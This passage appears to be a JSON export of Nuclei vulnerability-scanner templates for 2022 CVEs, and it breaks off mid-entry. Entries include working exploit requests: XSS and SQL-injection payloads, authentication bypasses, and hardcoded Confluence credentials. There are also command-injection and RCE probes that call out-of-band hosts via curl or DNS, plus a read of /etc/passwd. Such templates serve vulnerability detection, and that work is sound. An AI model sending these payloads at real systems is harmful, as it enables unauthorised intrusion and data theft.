Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setupHelp('')\" onerror=\"confirm('document.domain')"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://oast.me","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp","{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34534","info":{"name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/moduleInformation"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"name\\\":\", \"cloudHost\\\":\", \"remoteAddresses\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40oast.me&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-4305","info":{"name":"Login as User or Customer < 3.3 - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1\nHost: {{Hostname}}\nCookie: loginas_old_user_id=1\n","GET /wp-admin/users.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')"],"condition":"and"}]}]},{"id":"CVE-2022-0424","info":{"name":"Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npage=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"id\":\"","username\":\"","email\":","hash\":\"","_wpnonce"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command 